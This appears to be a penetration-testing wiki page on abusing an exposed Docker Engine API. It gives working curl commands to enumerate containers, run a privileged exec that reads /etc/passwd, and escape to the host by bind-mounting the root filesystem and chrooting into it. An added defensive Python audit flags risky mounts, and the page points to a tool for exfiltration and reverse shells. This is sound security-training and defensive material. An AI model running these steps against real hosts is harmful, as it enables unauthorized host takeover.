# Docker API

Docker exposes a REST API, the Docker Engine API, available by default on ports 2375 and 2376. The socket file is located at /var/run/docker.sock.

## Resources

* <https://dejandayoff.com/the-danger-of-exposing-docker.sock/>

## Enumeration

```
# Via TCP
curl "http://<ip>:2375/containers/json"     # List containers
curl "http://<ip>:2375/containers/<id or name>/json"    # Inspect a specific container
curl "http://<ip>:2375/containers/<id or name>/logs?stderr=1&stdout=1"    # Show logs
curl "http://<ip>:2375/containers/<id or name>/changes"    # Show changes

# Via Unix socket
curl -s --unix-socket /var/run/docker.sock "http://localhost/containers/..."
```

## Exploitation

### Creating a container

```
# Via unix
$ curl \
    -s \
    --unix-socket /var/run/docker.sock \
    "http://localhost/containers/create?name=mycontainer" \
    -X POST \
    -H "Content-Type: application/json" \
    -d '{ "Image": "alpine:latest", "Cmd": [ "id" ] }'
 
# Via TCP   
$ curl \
    -s \
    "http://<host>:<port>/containers/create?name=mycontainer" \
    -X POST \
    -H "Content-Type: application/json" \
    -d '{ "Image": "alpine:latest", "Cmd": [ "id" ] }'
```

### Starting a container

```
$ curl \
    -s \
    "http://<host>:<port>/containers/mycontainer/start" \
    -X POST \
    -H "Content-Type: application/json"
```

### Running a command in a container

#### Creation

```
$ curl \
    -s \
    "http://<host>:<port>/containers/<container_id>/exec" \
    -X POST \
    -H "Content-Type: application/json" \
    -d '{"AttachStdin": true,"AttachStdout": true,"AttachStderr": true,"Cmd": ["cat", "/etc/passwd"],"DetachKeys": "ctrl-p,ctrl-q","Privileged": true,"Tty": true}'

HTTP/1.1 201 Created
...

{"Id":"913c5ce2f3bc..."}
```

#### Execution

```
$ curl \
    -s \
    "http://<host>:<port>/exec/913c5ce2f3bc.../start" \
    -X POST \
    -H "Content-Type: application/json" \
    -d '{"Detach": false,"Tty": false}'

HTTP/1.1 200 OK
...

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
```

### Running a command on the host

#### Create an image

```
$ curl \
    -s \
    "http://<host>:<port>/images/create?fromImage=ubuntu&tag=latest" \
    -X POST \
    -H 'Content-Type: application/json'
```

#### Create a container

```
$ curl \
    -s \
    "http://<host>:<port>/containers/create" \
    -X POST \
    -H "Content-Type: application/json" \
    -d '{"Hostname": "","Domainname": "","User": "","AttachStdin": true,"AttachStdout": true,"AttachStderr": true,"Tty": true,"OpenStdin": true,"StdinOnce": true,"Entrypoint": "/bin/bash","Image": "ubuntu","Volumes": {"/hostfs/": {}},"HostConfig": {"Binds": ["/:/hostfs"]}}'
```

#### Start the container

#### Change the root directory

`$ chroot /hostfs`
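
From the defender's side, the host bind mount used in the steps above is visible in the container's inspect document. The following audit is an added example, not part of the original page: it flags containers that are privileged or that bind-mount sensitive host paths. It assumes the inspect documents were already collected from `/containers/<id>/json`; the sample data is constructed and the list of sensitive paths is an assumption to adapt.

```python
import json

# Constructed sample: entries shaped like GET /containers/<id>/json responses.
SAMPLE_INSPECT = json.loads("""
[
  {"Name": "/web", "HostConfig": {"Privileged": false, "Binds": ["/srv/www:/usr/share/nginx/html:ro"]},
   "Mounts": [{"Type": "bind", "Source": "/srv/www", "Destination": "/usr/share/nginx/html", "RW": false}]},
  {"Name": "/mycontainer", "HostConfig": {"Privileged": false, "Binds": ["/:/hostfs"]},
   "Mounts": [{"Type": "bind", "Source": "/", "Destination": "/hostfs", "RW": true}]},
  {"Name": "/ci-agent", "HostConfig": {"Privileged": true, "Binds": ["/var/run/docker.sock:/var/run/docker.sock"]},
   "Mounts": [{"Type": "bind", "Source": "/var/run/docker.sock", "Destination": "/var/run/docker.sock", "RW": true}]}
]
""")

# Assumption: host paths treated as sensitive; extend for your environment.
SENSITIVE_SOURCES = ("/", "/etc", "/root", "/var/run/docker.sock", "/run/docker.sock")

def bind_sources(inspect):
    """Collect host paths from both HostConfig.Binds and the resolved Mounts list."""
    host_cfg = inspect.get("HostConfig") or {}
    sources = {b.split(":")[0] for b in (host_cfg.get("Binds") or [])}
    sources |= {m["Source"] for m in (inspect.get("Mounts") or [])
                if m.get("Type") == "bind" and m.get("Source")}
    return sources

def audit_container(inspect):
    """Return a sorted list of findings for one container inspect document."""
    findings = []
    if (inspect.get("HostConfig") or {}).get("Privileged"):
        findings.append("privileged")
    for src in bind_sources(inspect):
        norm = src.rstrip("/") or "/"  # "/" must not collapse to an empty string
        if norm in SENSITIVE_SOURCES:
            findings.append(f"host-bind:{norm}")
    return sorted(findings)

def audit_all(inspects):
    """Map container name -> findings, keeping only containers with a finding."""
    report = {}
    for doc in inspects:
        found = audit_container(doc)
        if found:
            report[doc.get("Name", "<unnamed>").lstrip("/")] = found
    return report

if __name__ == "__main__":
    for name, found in audit_all(SAMPLE_INSPECT).items():
        print(f"{name}: {', '.join(found)}")
```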

## Tools

### Docker Knocker

Docker Knocker is a tool for exploiting a Docker API exposed without authentication. Among other things, it allows data exfiltration to a remote server and reverse shell execution.

Resource: <https://github.com/n00py/DockerKnocker/>

